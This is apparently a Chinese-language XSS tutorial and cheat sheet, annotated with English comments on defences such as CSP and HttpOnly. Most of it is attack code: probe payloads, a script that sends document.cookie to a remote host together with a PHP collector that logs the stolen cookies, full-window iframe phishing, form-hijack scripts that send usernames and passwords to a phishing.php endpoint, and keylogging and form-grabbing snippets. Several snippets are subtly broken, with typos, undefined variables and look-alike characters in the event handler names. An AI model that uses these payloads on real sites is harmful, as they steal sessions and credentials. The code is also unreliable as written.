一.入门
<html>
<!-- Minimal XSS test page: an inline script plus a zero-size iframe. Both are the
     kind of injected markup that output encoding and a Content-Security-Policy
     (script-src without 'unsafe-inline', frame-src) are meant to neutralise. -->
<head>test</head>
<!-- Refresh directive with no URL after the delay, so it reloads the current page
     rather than redirecting. -->
<meta http-equiv="refresh" content="0;">
<body>
<!-- Inline script execution is the usual proof that markup was injected unencoded;
     a CSP that disallows 'unsafe-inline' blocks it. -->
<script> alert("xss") </script>
<!-- 0x0 iframe: a third-party page loaded invisibly; CSP frame-src limits which
     origins may be framed like this. -->
<iframe src="http://www.baidu.com" width=0 height=0></iframe>
</body>
</html>
二.判断是否存在XSS
输入
<!-- Probe strings: once the application HTML-encodes < > " ' on output, each of these
     is rendered as inert text. A reflection that executes or breaks out of its
     surrounding context shows the sink is unencoded. -->
<script>alert(/XSS/)</script>
<script>alert("XSS")</script>
<!-- Context breakout: the leading closing tag ends an enclosing <textarea>, so output
     encoding is needed even for elements whose content is not normally parsed as markup. -->
</textarea> <script> alert(/XSS/) </script> <textarea> #如果被嵌入在textarea中
<!-- URL-scheme injection: an attribute that accepts a javascript: URL must be
     guarded by scheme allow-listing (http/https), not by HTML encoding alone. -->
<img src="javascript:alert('XSS');">
<!-- Attribute/quote breakout followed by navigation to an external page, and the
     same breakout used to embed a full-size frame. -->
"'><script>document.location.href="http://www.baidu.com"</script> #XSS钓鱼
'><iframe src="http://www.baidu.com" height="100%" width="100%" ></iframe>
三.XSS Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
四.查看Cookie
javascript:alert(document.cookie) 在地址栏输入
五.盗取Cookie
如果网站为 Cookie 设置了 HttpOnly 标志，可防止该 Cookie 被恶意 JavaScript 脚本读取
客户端
<script>
// Cookie exfiltration through an image request: document.cookie is placed in the
// query string of a GET to a remote host, so no XHR or fetch is needed.
// Defences: mark session cookies HttpOnly (document.cookie then omits them) and
// use a CSP img-src that does not allow arbitrary hosts.
// Detection: outbound requests whose query string carries a "cookie=" parameter.
img=new Image();
img.src="http://www.baidu.com/cookie.asp?cookie="+document.cookie;
img.width=0;
mg.height=0;
</script>
php远端
<?php
// Collection endpoint paired with the image-request script above: appends the raw
// "cookie" query value, one per line, to cookie.txt. On the server side, GET
// requests carrying a "cookie" parameter in the access log are the trace of this
// technique.
$cookie=$_GET['cookie'];
$log=fopen("cookie.txt","a");
fwrite($log,$cookie."\n");
fclose($log);
?>
六.跨站钓鱼
<html>
<!-- Full-window framing of a third-party site: the visitor sees the framed page while
     the address bar shows the hosting page's origin. The framed site defends itself
     with X-Frame-Options or CSP frame-ancestors, which make the browser refuse to
     render it inside this iframe. -->
<head>
<meta charset="UTF-8">
<title></title>
</head>
<body scroll="no">
<iframe src="http://www.baidu.com" height="100%" width="100%" scrolling="auto" frameborder="0" οnlοad="this.style.height=document.body.clientHeight"></iframe>
</body>
</html>
七.JavaScript劫持HTML表单
<script>
// Form hijack: a submit handler is placed on the form named "userslogin" that
// creates a hidden iframe whose URL carries the typed user and pass values to a
// third host; the handler does not return false, so the real submission still
// proceeds and the user sees nothing unusual.
// Mitigation lies in preventing the injection (output encoding, CSP without
// 'unsafe-inline'); CSP frame-src additionally limits where such an iframe may load from.
Form=document.forms["userslogin"];
Form.οnsubmit=function(){
var iframe=document.createElement("iframe");
iframe.style.display="none";
alert(Form.user.value)
iframe.src="http://127.0.0.1/phishing.php?user="+Form.user.value+"&passs="+Form.pass.value;
document.body.appendChild(iframe);
}
</script>
或者使用
<script>
// Same form-hijack idea split into two functions: parseData reads the user and
// pass fields of the "userlogin" form and returns true so the form still submits;
// saveData builds a hidden iframe pointing at a remote URL with the values in its
// query string. Any script running in the page origin can do this, which is why
// the defence is injection prevention rather than protecting the form itself.
loginForm=document.forms['userlogin'];
function parseData()
{
var user=loginForm.user.value;
var pass=loginForm.pass.value;
saveData(username,password);
return true;
}
function saveData(username,password)
{
var frame=document.createElement('iframe');
frame.src="http://127.0.0.1/phishing.php?user="+user+"&pass="+pass;
frame.style.display='none';
document.body.appendChild(frame);
}
loginForm.οnsubmit=parseData;
</script>
7.2 键盘记录
劫持onclick事件
// Rebinds the click handler of every link on the page to hijack (a function not
// shown here). Illustrates that an injected script controls the whole DOM, so
// per-element protections do not help once injection has occurred.
for(i=0;i<document.links.length;i++){
document.links[i].οnclick=hijack;
}
监听onkeydown事件
// Document-wide keydown listener: falls back to window.event for older IE, then
// calls hijcak (not defined here) inside try/catch so any error is swallowed and
// the page keeps behaving normally — nothing visible tells the user a listener is active.
document.οnkeydοwn=function(e){
if(!e) e=window.event;
try{ hijcak(); } catch(ex) { }
}
劫持表单
// On every keyup, (re)installs a submit handler on the "PassFormlogin" form that
// joins the username and password fields with "|" and hands the escaped string to
// log() (not shown). The reassignment on each keyup is presumably so the handler is
// present even when the form is added to the page after this script ran — confirm.
document.οnkeyup=function(){
document.forms['PassFormlogin'].οnsubmit=function(){
pwd=this.PassInputUsername0.value+'|'+this.PassInputPassword0.value;
log(escape(pwd));
}
}
遍历表单
// Walks every form and every control in it, separating password fields from other
// non-submit controls, and displays each value in an alert. For defenders the point
// is that script in the page origin can read form values before submission, so
// input masking and autofill give no protection once injection has occurred.
function grabber(){
F=document.forms;
for(var j=0;j<F.length;++j)
{
f=F[j];
for(i=0;i<f.length;++i)
{
// Password controls are reported separately from other inputs.
if(f[i].type.toLowerCase()=="password")
{
alert("Password:"+f[i].value)
}
// Submit buttons are skipped; every other control is reported as text.
else if(f[i].type.toLowerCase()!="submit")
{
alert("Text:"+f[i].value)
}
}
}
}
在 IE 浏览器中可以使用以下代码捕获特定按键
<script>
// IE-specific key capture: reads keyCode from the global event object (no event
// argument is used) and shows both the numeric code and the character it maps to.
// Like the listeners above, this only needs script execution in the page origin,
// so the mitigation is preventing injection and restricting inline script via CSP.
function keyDown(){
var keycode=event.keyCode;
var realkey=String.fromCharCode(event.keyCode);
alert("按键码: "+keycode+" 字符: "+realkey);
document.οnkeydοwn=keyDown;
}
</script>